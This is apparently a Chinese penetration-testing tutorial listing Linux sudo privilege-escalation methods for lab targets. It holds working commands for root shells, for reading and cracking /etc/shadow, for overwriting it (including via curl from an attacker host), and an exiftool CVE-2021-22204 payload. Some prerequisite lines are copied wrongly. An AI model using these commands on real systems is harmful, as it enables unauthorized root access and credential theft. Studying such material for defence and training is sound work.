渗透测试：Linux提权精讲（一）之sudo方法第一期

╰半橙微兮° 2023-10-14 06:21 31阅读 0赞

**目录**

写在开头

CVE-2019-14287

sudo apt和sudo apt-get

sudo apache2

sudo ash

sudo awk

sudo base32/58/64/nc/z

sudo cp

sudo cpulimit

sudo curl

sudo date

sudo dd

sudo dstat

sudo ed

sudo env

sudo exiftools

总结与思考

## 写在开头 ##

在进行渗透测试获取初始立足点的shell后，通常会运行sudo -l查看当前用户的权限，可通过系统已有可执行文件的权限实现提权。提权的本质就是**低权限的用户因为某种特殊的配置/漏洞，可利用具有高权限的指令/工具/脚本等执行高权限的操作**。有关Linux系统的提权方法有很多，包含passwd或shadow文件利用提权、自动任务提权、SUID提权、内核漏洞提权、第三方工具提权、sudo提权等等，本文将详解十几种sudo提权的方法。这些方法的总结与归类详见本文最后的**总结与思考**。

本文将在红队笔记大佬讲解的基础上，对Linux系统靶机的sudo提权方式进行简要总结。这里还是首先给出红队笔记大佬的视频链接：

[「红队笔记」Linux提权精讲：Sudo风暴 - Sudo风暴第1部分，扫地僧级别心法，研究提权技术的同时，打磨你对linux内核的深度理解。渗透测试宝典。\_哔哩哔哩\_bilibili][Linux_Sudo_ - Sudo_1_linux_bilibili]

查看当前用户的权限：

sudo -l

如果出现类似如下没有tty的提示，可能是shell交互性差的缘故：

![ec430898297f40e7849bfb0e3164f714.png][]

可以通过python映射一个shell，增强交互性：

python -c "import pty;pty.spawn('/bin/bash')"

此时再运行sudo -l应该就可以提升权限了，不过可能要输入当前用户的密码。

有一个开源项目GTFOBins介绍了常见的提权方法，本文提到的多数sudo提权方式多数也可以在该项目中搜索得到，详情见：[GTFOBins][]

![39be5291d032431b848de2317016084a.png][]

可以在其中搜索相应的提权方式，比如搜索find命令：

![b25e11d1c3674713b311e92de0c1b68f.png][]

可以直接找到对应的提权操作，其他命令的搜索方式类似。

![071bbc07a2924fa3853bf240b7b09206.png][]

下面进入正题，介绍基于具有sudo权限的可执行文件（命令）进行的提权操作。

## CVE-2019-14287 ##

**漏洞利用前提**

1.sudo版本要求：该漏洞针对1.8.28以下的sudo版本。查看sudo版本的指令是：

sudo -V |grep version

2.运行sudo -l后显示当前用户可以免密切换至其他任意非root用户，即：

> (ALL, !root) NOPASSWD: /bin/bash

**提权操作**

sudo -u#-1 /bin/bash

**提权原理**

通常情况，切换其他用户的shell可以采用的命令如下（以下两行均可，假设切换到Bossfrank用户，该用户的id为1001，可以通过/etc/passwd文件查看）

sudo -u bossfrank /bin/bash
    sudo -u#1001 /bin/bash

对于sudo版本低于1.8.28的情况，由于-1的用户id会被sudo解释为0，也就是root，从而造成提权。

## sudo apt和sudo apt-get ##

**漏洞利用前提**

当前用户可以以sudo高级权限运行apt指令。即运行sudo -l后会有如下的行：

> (root) NOPASSWD: /usr/bin/apt

详情可见[apt | GTFOBins][apt _ GTFOBins]

**提权操作**

针对sudo apt:

sudo apt update -o APT::Update::Pre-Invoke::=/bin/sh

针对 sudo apt-get

sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh

其中的-o指定apt的选项，APT::Update::Pre-Invoke::=/bin/sh都是apt的一个预处理选项，冒号的作用是名字空间。该选项是逐级访问的预处理指令，最终是执行了启动bash会话。

## sudo apache2 ##

**漏洞利用前提**

当前用户可以以sudo高级权限运行apt指令。即运行sudo -l后会有如下的行：

> (root) NOPASSWD: /usr/sbin/apache2

**操作方式**

sudo apache2 -f /etc/shadow

其中-f用于指定apache2的配置文件，我们指定存放了密码hash的文件/etc/shadow。执行时由于给定的配置文件有问题，肯定会出现报错，报错的时候会暴露/etc/shadow文件的第一行，从而给我们利用的可能。报错信息如下：

> Syntax error on line 1 of /etc/shadow:
> 
> Invalid command 'root:$6$TB/euwMK$0XA............:::',perhaps mispelled or defined by a module not in cluded in the server configuration

这样我们把其中关于root账号的密码hash$6$TB/euwMK$0XA............（此处这个hash只是示意）找个字典破解一下，有可能就能拿到密码。比如可以把密码hash命名为passwordhash，然后在kali中用john破解一下：

john passwordhash --wordlist=/usr/share/wordlists/rockyou.txt

如果能破解出来，那么就可以用这个密码作为凭据进行提权了，不过如果不是弱口令的话也很难破解出来。

## sudo ash ##

**漏洞利用前提**

当前用户可以以sudo高级权限运行ash指令。即运行sudo -l后会有如下的行：

> (root) NOPASSWD: /usr/bin/ash

详情可见[ash | GTFOBins][ash _ GTFOBins]

**操作方式**

sudo ash
    bash

直接运行sudo ash即可提权，本质上ash就是启动一个shell的命令。既然可以以高权限启动，相当于直接提权，再用命令bash开启一个会话提高shell的交互性。这里的**关键在于认出ash就是一种shell环境**。与之类似还有bash/csh/zsh/sh/tclsh/dash等，均为shell环境。

## sudo awk ##

**漏洞利用前提**

当前用户可以以sudo高级权限运行ash指令。即运行sudo -l后会有如下的行：

> (root) NOPASSWD: /usr/bin/awk

详情可见[awk | GTFOBins][awk _ GTFOBins]

**操作方式**

sudo awk 'BEGIN {system("/bin/sh")}'

awk是常用的文本处理工具之一，上述命令中单引号中的内容是传递给awk工具的脚本，而BEGIN是awk工具的一个特殊模式，表示在处理任何输入前执行的动作，我们用大括号\{\}添加了指定awk执行的操作：系统命令——启动一个shell环境，从而实现提权。

## sudo base32/58/64/nc/z ##

**漏洞利用前提**

当前用户可以以sudo高级权限运行base32/58/64/nc/z指令。即运行sudo -l后会有如下的行（此处以base4为例）：

> (root) NOPASSWD: /usr/bin/base64

详情见[base64 | GTFOBins][base64 _ GTFOBins]

**操作方式**

bossfrank=/etc/shadow
    sudo base64 "$bossfrank" | base64 -d

base64就是用来编码的，具有sudo权限后可以读取高权限用户才能读取的文件。我们可以利用base64工具的权限，对敏感其进行编码再解码，读取结果（也就是读取原始文件）。 利用这种方式我们就可读取原本的shadow文件，然后再对root用户的hash进行字典碰撞破解，如果破解成功，即可su提权。（base64/58/32/nc/z的利用方式相似）

## sudo cp ##

**漏洞利用前提**

当前用户可以以sudo高级权限运行复制cp指令。即运行sudo -l后会有如下的行：

> (root) NOPASSWD: /usr/bin/cp

详情见[cp | GTFOBins][cp _ GTFOBins]

**操作方式**

本质思路就是利用复制的高权限，我们可以**自己写一个shadow文件，通过复制操作覆盖原有的shadow文件**，从而修改了root账户的密码，用新的密码进行提权。

详情可见[cp | GTFOBins][cp _ GTFOBins]，具体操作如下：

首先我们可以用mkpasswd生成sha-512加密（/etc/shadow中密码的加密方式）的密文，我们企图把root账户的密码修改为123456，故此处命令为：

mkpasswd -m sha-512 123456

![73a8c5f93edb4e18afd4ecceb763fe94.png][]

加密结果为：

> $6$xN1oF.DguPuEFNRA$AioCGARgZikdMFSmMygmnY5PmF7JDOKi5A/M9ESTsNKZvpWTYSku3f9atqjAEapxltWMve4iff82svVapfLUx.

查看kali的/etc/shadow可以看到通常情况下shadow的形式

cat /etc/shadow | grep root

![fba6987da1f6413d89463060703cfa8e.png][]

照着这个形式，我们可以构造一行如下的字符串，这行字符串之后会拷贝覆盖靶机中的/etc/shadow文件：

> root:$6$xN1oF.DguPuEFNRA$AioCGARgZikdMFSmMygmnY5PmF7JDOKi5A/M9ESTsNKZvpWTYSku3f9atqjAEapxltWMve4iff82svVapfLUx.:18225:0:99999:7:::

然后在靶机中进行如下的操作：

首先声明一个环境变量，用于指向/etc/shadow：

bossfrank=/etc/shadow

然后再生成一个名为TF的变量，指向用mktemp生成的临时文件：

TF=$(mktemp)

然后将刚刚我们生成的shadow记录（即root账户密码是123456）写入TF变量：

echo 'root:$6$xN1oF.DguPuEFNRA$AioCGARgZikdMFSmMygmnY5PmF7JDOKi5A/M9ESTsNKZvpWTYSku3f9atqjAEapxltWMve4iff82svVapfLUx.:18225:0:99999:7:::' > $TF

--------------------

插叙一下，此时可以查看TF变量的内容，输出TF（echo $TF）可以看到：

> /tmp/tmp.Rmzxhak

再查看这个临时文件（cat /tmp/tmp.Rmzxhak），就是我们刚刚的那条shadow记录

--------------------

最后是关键步骤，使用sudo的cp复制指令，将我们的这条shadow记录复制到/etc/shadow，实现覆盖操作：

sudo /usr/bin/cp $TF $bossfrank

只要用密码123456即可提权。

特别注意，这个操作对于靶机是**有损的！会把原有的/etc/shadow覆盖掉，只保留了含有root的一条信息**。因此这个提权操作的优先级并不高，同时操作前建议先对原有的/etc/shadow文件进行备份。使用临时变量$TF的操作是GTFOBins的推荐操作，虽然看起来复杂，但**利用临时变量、临时文件的方法对于实际攻防中隐藏特征、自动清除痕迹很有意义**。如果单纯想要提权的话可以不用这种方法。

## sudo cpulimit ##

**漏洞利用前提**

当前用户可以以sudo高级权限运行cpulimit指令。即运行sudo -l后会有如下的行：

> (root) NOPASSWD: /usr/bin/cpulimit

详情见[cpulimit | GTFOBins][cpulimit _ GTFOBins]

**提权操作**

sudo cpulimit -l 100 -f /bin/bash

其中-l 100用于限制（指定）cpu的使用率，此处为100%，-f参数表示运行某个程序，该程序以-l参数指定的使用率占用CPU，此处执行的程序就是启动/bash，由于cpulimit具有sudo权限，故可以直接提权。

## sudo curl ##

**漏洞利用前提**

当前用户可以以sudo高级权限运行curl指令。即运行sudo -l后会有如下的行：

> (root) NOPASSWD: /usr/bin/curl

详情见[curl | GTFOBins][curl _ GTFOBins]

**操作方式**

该操作的本质思路与sudo cp小节的类似，都是通过覆盖系统的/etc/shadow文件修改root密码，达到提权的目的。前述生成shadow格式的操作见sudo cp小节，这里把对于123456进行sha-512加密的shadow形式的字符串存成了一个文件shadow\_entry，这就是我们的payload：

![a7beada0d4434e5fa409c4afdee45e7d.png][]

在kali中启动一个http服务，架设一个站点，用于存放这个恶意载荷payload：

php -S 0:80

![f626c66edb314b128a5eb5e59e1312d0.png][]

然后在靶机中通过sudo curl访问kali上的payload，也就是这个shadow\_entry，并**把结果输出到/etc/shadow，从而覆盖了靶机原有的/etc/shadow文件，实现了对root账户的密码修改**。

sudo curl http://kali的ip/shadow_entry -o /etc/shadow

\-o参数用于将结果输出到文件，接下来只要su提权，输入我们的密码即可。该方法同样由于覆盖了原有的/etc/shadow，对靶机的系统是有破坏的。

## sudo date ##

**漏洞利用前提**

当前用户可以以sudo高级权限运行日期date指令。即运行sudo -l后会有如下的行：

> (root) NOPASSWD: /usr/bin/date

**操作方式**

sudo date命令的提权操作与sudo apache2的操作相似

sudo date -f /etc/shadow

其中-f用于指定读取日期的路径。我们利用date的sudo权限从/etc/shadow中读取日期，/etc/shadow中不存在日期信息，会出现报错，但报错中会显示/etc/shadow的内容：

![45791fa90d7942cba879a474330f62d8.png][]

然后执行hash碰撞即可。

## sudo dd ##

**漏洞利用前提**

当前用户可以以sudo高级权限运行dd指令。 即运行sudo -l后会有如下的行：

> (root) NOPASSWD: /usr/bin/dd

详情见[dd | GTFOBins][dd _ GTFOBins]

**操作方式**

dd指令是一个命令行工具，可对原始指令进行复制、转化，可以用于转换编码、生成文件等。

该提权方法与前述的sudo cp 和 sudo curl有类似之处，都是通过覆盖/etc/shadow文件的方法，覆盖后使用自己的设定的密码进行登录。首先还是先构造一个shadow形式的字符串，设定密码为123456（方法详见sudo cp）：

> root:$6$xN1oF.DguPuEFNRA$AioCGARgZikdMFSmMygmnY5PmF7JDOKi5A/M9ESTsNKZvpWTYSku3f9atqjAEapxltWMve4iff82svVapfLUx.:18225:0:99999:7:::

运行如下指令即可实现对靶机/etc/shadow文件的覆盖：

echo "root:$6$xN1oF.DguPuEFNRA$AioCGARgZikdMFSmMygmnY5PmF7JDOKi5A/M9ESTsNKZvpWTYSku3f9atqjAEapxltWMve4iff82svVapfLUx.:18225:0:99999:7:::" | sudo dd of=/etc/shadow

of参数用于输出文件，这里设置为/etc/shadow，就会将我们构造的payload输出到/etc/shadow，实现对靶机中/etc/shadow的覆盖。 同样，这对于靶机也是有损的，建议先备份原有的/etc/shadow。

## sudo dstat ##

**漏洞利用前提**

当前用户可以以sudo高级权限运行dstat指令。 即运行sudo -l后会有如下的行：

> (root) NOPASSWD: /usr/bin/dstat

详情见[dstat | GTFOBins][dstat _ GTFOBins]

**提权操作**

该操作的核心逻辑是dstat指令可以指定插件，我们可以在插件目录中写入我们用于提权的exp脚本，然后sudo运行dstat的时候同时指定这个插件脚本，即可实现提权。dstat的插件目录通常位于/usr/local/share/dstat或/usr/share/dstat，可以先通过find命令进行查找到底是哪个目录：

find / -name dstat -type f 2>/dev/null

这里假定插件目录是/usr/share/dstat，我们在这个目录中写入我们的python提权脚本（插件）dstat\_exp.py：

import os; os.execv("/bin/sh", ["sh"])

当然也可以直接echo到指定目录：

echo 'import os; os.execv("/bin/sh", ["sh"])' >/usr/local/share/dstat/dstat_exp.py

然后sudo运行dstat的时候指定插件名exp即可提权：

sudo dstat --exp

注意此处我们插件的脚本名称是dstat\_exp.py，但指定插件名称时输入的是exp。

## sudo ed ##

**漏洞利用前提**

当前用户可以以sudo高级权限运行文本编辑器ed。 即运行sudo -l后会有如下的行：

> (root) NOPASSWD: /usr/bin/ed

详情见[ed | GTFOBins][ed _ GTFOBins]

**提权操作**

直接sudo运行ed即可进入文本编辑界面，然后输入：

!/bin/bash

即可直接提权。感叹号!表明执行系统命令。我们执行的系统命令是/bin/bash，即启动bash，又由于ed本身是以sudo执行的，从而启动了root的bash，实现了提权。

## sudo env ##

当前用户可以以sudo高级权限运行文本编辑器ed。 即运行sudo -l后会有如下的行：

> (root) NOPASSWD: /usr/bin/ed

详情见[env | GTFOBins][env _ GTFOBins]

**提权操作**

直接sudo运行env执行/bin/bash即可：

sudo env /bin/sh

env通常用于设定环境变量相关的参数，在此处也可以执行命令，直接以启动bash即可提权。

## sudo exiftools ##

**漏洞利用前提**

当前用户可以以sudo高级权限运行文本编辑器ed。 即运行sudo -l后会有如下的行：

> (root) NOPASSWD: /usr/bin/exiftool

且exiftool的版本在7.44-12.23范围内，可用exiftool -ver查看版本。

详情见[exiftool | GTFOBins][exiftool _ GTFOBins]，这其实是有关exiftool的一个漏洞（CVE-2021-22204），详细漏洞源码可见[ExifTool 12.23 - Arbitrary Code Execution - Linux local Exploit (exploit-db.com)][ExifTool 12.23 - Arbitrary Code Execution - Linux local Exploit _exploit-db.com]

**提权操作**

这里给出红队笔记大佬的漏洞利用方式，按照上述漏洞源码中提示的逻辑操作即可：

首先构造payload，并在里面写入源数据，启动一个系统的shell：

echo  "(metadata \"\c${system('/bin/bash')};\")" > payload

或直接vi payload编辑：

(metadata "\c${system('/bin/bash')};")

然后使用bzz工具进行压缩：

bzz payload payload.bzz

按照利用文件，用djvumake工具生成利用文件exploit.djvu，djvu是一种图像文件压缩格式，主要用于扫描文档和电子书格式。

djvumake exploit.djvu INFO='1,1' BGjp=/dev/null ANTz=payload.bzz

提权命令：

sudo exiftool exploit.djvu

运行即可提权。

## 总结与思考 ##

本文介绍了15种常见的sudo提权方式，主要还是利用了系统配置的缺陷，使得低权限的用户（初始靶机shell）能够以root权限sudo免密执行高权限的指令。相信通过本文的介绍，希望读者能够对提权的本质：**低权限用户因为某种原因（配置/漏洞）能够运行高权限的指令/工具/脚本，**有更为直观的理解。最后决定还是将本文的15种提权方式强行来一个归类总结，纯属个人理解，如果有总结不到位的地方还请读者多多指出。

> 漏洞相关：CVE-2019-14287 , CVE-2021-22204(sudo exiftools)
> 
> 直接读取敏感文件：sudo base32/58/64/nc/z
> 
> 可执行系统命令：sudo apt/apt-get , sudo awk , sudo cpulimit , sudo dstat , sudo ed , sudo env
> 
> 通过错误配置的报错信息读取敏感文件：sudo apache2 , sudo date
> 
> 直接执行bash：sudo bash/ash/zsh/sh/dash/tclsh等
> 
> 可覆盖系统敏感配置：sudo cp , sudo dd , sudo curl

这篇博客到这里就结束了，总结真的不易，**还请读者多多点赞关注支持**！ 本文所提到的提权方式我并没有全部实践过，可能还需要长期的渗透测试打靶与实践才能遇到这么多种情况吧。近期我将继续总结有关Linux提权相关的方法、也会继续坚持打靶，还望读者多多支持。

![ee16304d859343fca20be3bf5b4ed48b.png][]

[Linux_Sudo_ - Sudo_1_linux_bilibili]: https://www.bilibili.com/video/BV11h4y1s74q/
[ec430898297f40e7849bfb0e3164f714.png]: https://img-blog.csdnimg.cn/ec430898297f40e7849bfb0e3164f714.png
[GTFOBins]: https://gtfobins.github.io/
[39be5291d032431b848de2317016084a.png]: https://img-blog.csdnimg.cn/39be5291d032431b848de2317016084a.png
[b25e11d1c3674713b311e92de0c1b68f.png]: https://img-blog.csdnimg.cn/b25e11d1c3674713b311e92de0c1b68f.png
[071bbc07a2924fa3853bf240b7b09206.png]: https://img-blog.csdnimg.cn/071bbc07a2924fa3853bf240b7b09206.png
[apt _ GTFOBins]: https://gtfobins.github.io/gtfobins/apt/#sudo
[ash _ GTFOBins]: https://gtfobins.github.io/gtfobins/ash/
[awk _ GTFOBins]: https://gtfobins.github.io/gtfobins/awk/
[base64 _ GTFOBins]: https://gtfobins.github.io/gtfobins/base64/
[cp _ GTFOBins]: https://gtfobins.github.io/gtfobins/cp/
[73a8c5f93edb4e18afd4ecceb763fe94.png]: https://img-blog.csdnimg.cn/73a8c5f93edb4e18afd4ecceb763fe94.png
[fba6987da1f6413d89463060703cfa8e.png]: https://img-blog.csdnimg.cn/fba6987da1f6413d89463060703cfa8e.png
[cpulimit _ GTFOBins]: https://gtfobins.github.io/gtfobins/cpulimit/
[curl _ GTFOBins]: https://gtfobins.github.io/gtfobins/curl/
[a7beada0d4434e5fa409c4afdee45e7d.png]: https://img-blog.csdnimg.cn/a7beada0d4434e5fa409c4afdee45e7d.png
[f626c66edb314b128a5eb5e59e1312d0.png]: https://img-blog.csdnimg.cn/f626c66edb314b128a5eb5e59e1312d0.png
[45791fa90d7942cba879a474330f62d8.png]: https://img-blog.csdnimg.cn/45791fa90d7942cba879a474330f62d8.png
[dd _ GTFOBins]: https://gtfobins.github.io/gtfobins/dd/
[dstat _ GTFOBins]: https://gtfobins.github.io/gtfobins/dstat/
[ed _ GTFOBins]: https://gtfobins.github.io/gtfobins/ed/
[env _ GTFOBins]: https://gtfobins.github.io/gtfobins/env/
[exiftool _ GTFOBins]: https://gtfobins.github.io/gtfobins/exiftool/
[ExifTool 12.23 - Arbitrary Code Execution - Linux local Exploit _exploit-db.com]: https://www.exploit-db.com/exploits/50911
[ee16304d859343fca20be3bf5b4ed48b.png]: https://img-blog.csdnimg.cn/ee16304d859343fca20be3bf5b4ed48b.png